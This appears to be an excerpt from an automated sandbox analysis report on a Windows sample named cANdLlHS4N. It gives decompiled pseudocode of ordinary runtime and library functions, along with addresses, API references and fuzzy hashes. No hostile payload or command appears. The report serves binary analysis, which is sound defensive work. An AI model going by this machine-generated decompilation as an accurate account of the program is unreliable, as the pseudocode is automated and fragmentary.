      0x009a11dd
      0x009a1248
      0x009a124c
      0x009a11df
      0x009a11df
      0x009a11e4
      0x00000000
      0x009a11e6
      0x009a11ee
      0x009a11f1
      0x009a11f9
      0x009a11fd
      0x009a1200
      0x009a1202
      0x009a1204
      0x009a1204
      0x009a1208
      0x009a1220
      0x009a1225
      0x009a1225
      0x009a1229
      0x009a122c
      0x009a122e
      0x009a120a
      0x009a120a
      0x009a1210
      0x009a1210
      0x009a1214
      0x009a1217
      0x009a1219
      0x009a121e
      0x009a1233
      0x009a1234
      0x009a1235
      0x009a1204
      0x009a1243
      0x009a1243
      0x009a11e4

      APIs
      • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 009A11F1
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ProtectVirtual
      • String ID:
      • API String ID: 544645111-0
      • Opcode ID: 82e0a789294ac4097d37b66dfd46c3f6024cb1614e740670f8423e999b13289b
      • Instruction ID: 12362d18e54ac3b339cb2a350a67d247ee71e8a452e1f495bed4325ae7c67e0d
      • Opcode Fuzzy Hash: 82e0a789294ac4097d37b66dfd46c3f6024cb1614e740670f8423e999b13289b
      • Instruction Fuzzy Hash: 2701DE722040952BD7204E6D98C07EFBB9EEBC2324F69C52AE9E4CA101C130D88683E0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00ABB065 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 86%
      			E00ABB065(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0xd13a24, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0xd142e8;
					if( *0xd142e8 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00AB6403(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00AADB06(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










      0x00abb06a
      0x00abb06f
      0x00abb08c
      0x00abb091
      0x00abb093
      0x00abb095
      0x00abb097
      0x00abb097
      0x00abb097
      0x00000000
      0x00abb09f
      0x00abb0a8
      0x00abb0ae
      0x00abb0b0
      0x00000000
      0x00000000
      0x00abb0e4
      0x00abb0e6
      0x00000000
      0x00abb0b2
      0x00abb0b2
      0x00abb0b9
      0x00abb0d7
      0x00abb0da
      0x00abb0dc
      0x00abb0de
      0x00abb0de
      0x00abb0bb
      0x00abb0bc
      0x00abb0c2
      0x00abb0c4
      0x00abb098
      0x00abb098
      0x00abb09a
      0x00abb09d
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00abb0c6
      0x00abb0c6
      0x00abb0c9
      0x00abb0cb
      0x00abb0cd
      0x00abb0cd
      0x00abb0d3
      0x00abb0d3
      0x00abb0c4
      0x00000000
      0x00abb071
      0x00abb075
      0x00abb078
      0x00abb07b
      0x00000000
      0x00abb07d
      0x00abb082
      0x00abb08b
      0x00abb08b
      0x00abb07b
      0x00000000

      APIs
      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AB4DA5,00000000,?,00000000,00000000,00000000,?,00AB4236,00000001,00000214), ref: 00ABB0A8
        • Part of subcall function 00AADB06: __getptd_noexit.LIBCMT ref: 00AADB06
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AllocateHeap__getptd_noexit
      • String ID:
      • API String ID: 328603210-0
      • Opcode ID: 55fdf88104db90617811f3ee1c72617a99381bb9d84c5a4ee21e036d88c222ef
      • Instruction ID: f5d3ab543284786ceb8289f7699bec422c56efaf5882aba58c3cc96162e2cfea
      • Opcode Fuzzy Hash: 55fdf88104db90617811f3ee1c72617a99381bb9d84c5a4ee21e036d88c222ef
      • Instruction Fuzzy Hash: 8A019E312212159AEB34BF25DC04BFB37A8AB81360F01852AE865CB6D1DBB08C00C760
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BCDBD Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 96%
      			E009BCDBD(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				long* _t24;
				intOrPtr _t25;
				intOrPtr* _t30;
				void* _t31;

				_t23 = __ecx;
				_t22 = __ebx;
				_push(4);
				E00AAD232(0xac8abe, __ebx, __edi, __esi);
				_t30 = __ecx;
				if((0 |  *((intOrPtr*)(_t31 + 8)) != 0x00000000) == 0) {
					L1:
					E009B8782(_t23);
				}
				if( *_t30 == 0) {
					_t23 =  *0xd0fcc0; // 0x0
					if(_t23 != 0) {
						L5:
						_t19 = E009BC9BB(_t23); // executed
						 *_t30 = _t19;
						if(_t19 == 0) {
							goto L1;
						}
					} else {
						 *((intOrPtr*)(_t31 - 0x10)) = 0xd0fcc4;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t21 = E009BCAD3(0xd0fcc4);
						 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
						_t23 = _t21;
						 *0xd0fcc0 = _t21;
						if(_t21 == 0) {
							goto L1;
						} else {
							goto L5;
						}
					}
				}
				_t24 =  *0xd0fcc0; // 0x0
				_t28 = E009BC85D(_t24,  *_t30);
				_t39 = _t28;
				if(_t28 == 0) {
					_t17 =  *((intOrPtr*)(_t31 + 8))();
					_t25 =  *0xd0fcc0; // 0x0
					_t28 = _t17;
					E009BCB7A(_t22, _t25, _t17, _t30, _t39,  *_t30, _t17);
				}
				return E00AAD30A(_t28);
			}










      0x009bcdbd
      0x009bcdbd
      0x009bcdbd
      0x009bcdc4
      0x009bcdc9
      0x009bcdd5
      0x009bcdd7
      0x009bcdd7
      0x009bcdd7
      0x009bcddf
      0x009bcde1
      0x009bcde9
      0x009bce0c
      0x009bce0c
      0x009bce11
      0x009bce15
      0x00000000
      0x00000000
      0x009bcdeb
      0x009bcdf0
      0x009bcdf3
      0x009bcdf7
      0x009bcdfc
      0x009bce00
      0x009bce02
      0x009bce0a
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009bce0a
      0x009bcde9
      0x009bce19
      0x009bce24
      0x009bce26
      0x009bce28
      0x009bce2a
      0x009bce2d
      0x009bce33
      0x009bce38
      0x009bce38
      0x009bce44

      APIs
      • __EH_prolog3.LIBCMT ref: 009BCDC4
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8H_prolog3Throw
      • String ID:
      • API String ID: 3670251406-0
      • Opcode ID: b7136be5bdff8582178355d99f648accf9d464350a0c027afe4f8c4108aa574b
      • Instruction ID: 6c343e9c78424c8c3c3a4b3510cb8410b6c80272d468b354f56585fbdc0b1133
      • Opcode Fuzzy Hash: b7136be5bdff8582178355d99f648accf9d464350a0c027afe4f8c4108aa574b
      • Instruction Fuzzy Hash: 5D017CB4640206DBEB24AF648A527A93AA6BBC0370F20403EE895C77D0DF30CD00CB65
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AD67F Relevance: 1.5, APIs: 1, Instructions: 31COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009AD67F(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* __esi;
				void* __ebp;
				void* _t10;
				long _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;
				struct HWND__* _t19;

				if(_a8 != 0x360) {
					_t19 = _a4;
					_t10 = E009AC937(_t14, _t15, _t16, _t17, _t19, __eflags, _t19);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						_t11 = DefWindowProcA(_t19, _a8, _a12, _a16);
						L6:
						return _t11;
					}
					__eflags =  *((intOrPtr*)(_t10 + 0x20)) - _t19;
					if(__eflags != 0) {
						goto L5;
					}
					_t11 = E009AD57A(_t14, _t17, _t19, __eflags, _t10, _t19, _a8, _a12, _a16); // executed
					goto L6;
				}
				return 1;
			}












      0x009ad68b
      0x009ad693
      0x009ad697
      0x009ad69c
      0x009ad69e
      0x009ad6b7
      0x009ad6c1
      0x009ad6c7
      0x00000000
      0x009ad6c7
      0x009ad6a0
      0x009ad6a3
      0x00000000
      0x00000000
      0x009ad6b0
      0x00000000
      0x009ad6b0
      0x00000000

      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9d1fbdfb69218825c9dd97540010accc4719a5cc217dd778e38276f94e0852cd
      • Instruction ID: 9dbf9c028f1b1b39ad026107e16f89f8acbc8b42bcb01d463edf8bdc52a9ed99
      • Opcode Fuzzy Hash: 9d1fbdfb69218825c9dd97540010accc4719a5cc217dd778e38276f94e0852cd
      • Instruction Fuzzy Hash: 64F08C32402258FB8F129E909C04DEB3B2DAF4A361F048415FA1A51420C336C920EBE5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A705A Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009A705A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _t6;
				void* _t13;
				void* _t17;
				intOrPtr* _t18;

				_t18 = __ecx;
				_t6 = E009AC865(_t13, __ecx, _t17, __eflags);
				if(_t6 != 0xffffffff) {
					_t6 =  *((intOrPtr*)( *_t18 + 0x198))(_a4, _a8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L1;
					}
					PostMessageA( *(_t18 + 0x20), 0x362, 0xe001, 0);
					 *((intOrPtr*)( *_t18 + 0x174))(1);
					__eflags = 0;
					return 0;
				}
				L1:
				return _t6 | 0xffffffff;
			}







      0x009a7060
      0x009a7062
      0x009a706a
      0x009a707b
      0x009a7081
      0x009a7083
      0x00000000
      0x00000000
      0x009a7094
      0x009a70a0
      0x009a70a6
      0x00000000
      0x009a70a6
      0x009a706c
      0x00000000

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MessagePost
      • String ID:
      • API String ID: 410705778-0
      • Opcode ID: c8593db107e429a3bd0550f2f008151054ce99ebd2fee39a454af26ef2aeabe8
      • Instruction ID: 55db02d3c83828867b8e6e89c041e1eeb40f50c001f8e831e6967726ccd9ef12
      • Opcode Fuzzy Hash: c8593db107e429a3bd0550f2f008151054ce99ebd2fee39a454af26ef2aeabe8
      • Instruction Fuzzy Hash: CFF0A731344610ABCB215B74CC05F9A7BA5AF45730F110616F9659A1D1CAB1D8509A80
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BC8C9 Relevance: 1.5, APIs: 1, Instructions: 21COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 88%
      			E009BC8C9(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t19;
				void* _t20;

				_push(8);
				E00AAD265(0xac8a78, __ebx, __edi, __esi);
				_t19 = __ecx;
				if( *__ecx == 0) {
					E009C2A0C(0x10);
					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
					if( *__ecx == 0) {
						 *__ecx =  *((intOrPtr*)(_t20 + 8))();
					}
					 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
					E009C2A7E(0x10);
				}
				return E00AAD30A( *_t19);
			}





      0x009bc8c9
      0x009bc8d0
      0x009bc8d5
      0x009bc8db
      0x009bc8df
      0x009bc8e6
      0x009bc8ec
      0x009bc8f1
      0x009bc8f1
      0x009bc8f3
      0x009bc8f9
      0x009bc8f9
      0x009bc905

      APIs
      • __EH_prolog3_catch.LIBCMT ref: 009BC8D0
        • Part of subcall function 009C2A0C: EnterCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A46
        • Part of subcall function 009C2A0C: InitializeCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A58
        • Part of subcall function 009C2A0C: LeaveCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A65
        • Part of subcall function 009C2A0C: EnterCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A75
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
      • String ID:
      • API String ID: 1641187343-0
      • Opcode ID: 1f48247ea89a5c653d1e89a18146b8271a3caf6e4b6b12f44f6c057735f503ca
      • Instruction ID: ad2c88204413c88489bb92cc6837eb972a4591b0a13b2beed6c2d6cc09a9a3a2
      • Opcode Fuzzy Hash: 1f48247ea89a5c653d1e89a18146b8271a3caf6e4b6b12f44f6c057735f503ca
      • Instruction Fuzzy Hash: 01E04F30600305ABEB70AFA8C606B8CB6E0BF51760F10492CF5D1EB2C0DB7089409725
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AFB60 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
      Download Yara Rule
      C-Code - Quality: 86%
      			E009AFB60(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t22;
				void* _t23;

				_push(4);
				E00AAD232(0xac885e, __ebx, __edi, __esi);
				_t22 = __ecx;
				 *((intOrPtr*)(_t23 - 0x10)) = __ecx;
				E009A5D70(__ecx, __edx, E009B9D52());
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				if(E009AE87C( *((intOrPtr*)(_t23 + 8))) == 0) {
					E009A6000(__edx, __edi,  *((intOrPtr*)(_t23 + 8))); // executed
				}
				return E00AAD30A(_t22);
			}





      0x009afb60
      0x009afb67
      0x009afb6c
      0x009afb6e
      0x009afb79
      0x009afb81
      0x009afb8e
      0x009afb95
      0x009afb95
      0x009afba1

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3
      • String ID:
      • API String ID: 431132790-0
      • Opcode ID: 76d454f83fe277bac2e3c0019a924a43a3576ad06aae503f1c91de9e7a6bef91
      • Instruction ID: 1366cb4ea1ebd65df6f83a8f1e7c36d22abfd009fef71475297d4c6a7d5d0060
      • Opcode Fuzzy Hash: 76d454f83fe277bac2e3c0019a924a43a3576ad06aae503f1c91de9e7a6bef91
      • Instruction Fuzzy Hash: EBE0CD7030052067DF067B64891275D35117F85700F404018F5465F2C2CF394F0187DE
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A6C30 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009A6C30(short* _a4, int _a8) {
				int _t4;

				_t4 = WideCharToMultiByte(3, 0, _a4, _a8, 0, 0, 0, 0); // executed
				return _t4;
			}




      0x009a6c44
      0x009a6c4b

      APIs
      • WideCharToMultiByte.KERNELBASE(00000003,00000000,?,?,00000000,00000000,00000000,00000000,?,009A8E09,00000002,00000000,?,00000000,?,00000001), ref: 009A6C44
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharMultiWide
      • String ID:
      • API String ID: 626452242-0
      • Opcode ID: 64cbcaab814106b5dbf4594ce38bc029cdac8a0cc9e87c452cab16dae8c983d7
      • Instruction ID: 293e369c320787595af76d1f9a09884b39082db77f2a8f868903a6fba280efb7
      • Opcode Fuzzy Hash: 64cbcaab814106b5dbf4594ce38bc029cdac8a0cc9e87c452cab16dae8c983d7
      • Instruction Fuzzy Hash: 48C04CF6140108BFFB011ED19D05EB77B5DD784610F008015BE1DC5051D6729D119671
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AC64EE Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 63%
      			E00AC64EE(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
				signed int _v0;
				void* __ebp;
				intOrPtr _t9;
				void* _t10;
				signed int _t12;
				signed int _t16;
				void* _t29;

				_t26 = __esi;
				_t22 = __edx;
				if( *0xd0df08 != 0) {
					 *0xd0df08 =  *0xd0df08 - 1; // executed
					__eflags =  *0xd0df08;
					__imp__EncodePointer(_a4);
					_t16 =  *0xd0df08; // 0xa
					 *((intOrPtr*)(0xd14590 + _t16 * 4)) = _t9;
					return _t9;
				} else {
					_t10 = L00AB607A(_t9);
					_t31 = _t10;
					if(_t10 != 0) {
						_push(0x16);
						L00AB6087(__ebx, __edx, __edi, __esi, _t31);
					}
					if(( *0xd0cf18 & 0x00000002) != 0) {
						E00AB4A12(_t22, _t26, 3, 0x40000015, 1);
						_t29 = _t29 + 0xc;
					}
					E00AACBF2(3);
					asm("int3");
					_t12 =  *0xd0cf18;
					 *0xd0cf18 =  !_a4 & _t12 | _v0 & _a4;
					return _t12;
				}
			}










      0x00ac64ee
      0x00ac64ee
      0x00ac64fa
      0x00ac6505
      0x00ac6505
      0x00ac650b
      0x00ac6511
      0x00ac6517
      0x00ac651f
      0x00ac64fc
      0x00ab67fa
      0x00ab67ff
      0x00ab6801
      0x00ab6803
      0x00ab6805
      0x00ab680a
      0x00ab6812
      0x00ab681d
      0x00ab6822
      0x00ab6822
      0x00ab6827
      0x00ab682c
      0x00ab6835
      0x00ab6846
      0x00ab684d
      0x00ab684d

      APIs
      • RtlEncodePointer.NTDLL(00000004,?,00AC5BDD,00AC5B8C,?,00AC5E47,00000000,00000000,00000004,009A1A1F), ref: 00AC650B
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: EncodePointer
      • String ID:
      • API String ID: 2118026453-0
      • Opcode ID: ff1c4f2d287ead66b8d4a08e05ae9e06e19b4b8c277ff45eeab5ad6c36fc0bc9
      • Instruction ID: 5526bcca0edf559b5d2e98055862682297ab21861425ed8b1a2fc90694f7761d
      • Opcode Fuzzy Hash: ff1c4f2d287ead66b8d4a08e05ae9e06e19b4b8c277ff45eeab5ad6c36fc0bc9
      • Instruction Fuzzy Hash: 49D09E71005749EFDB00AF90F844F657F76E754355F118016D80F82761DB325491DA50
      Uniqueness

      Uniqueness Score: -1.00%

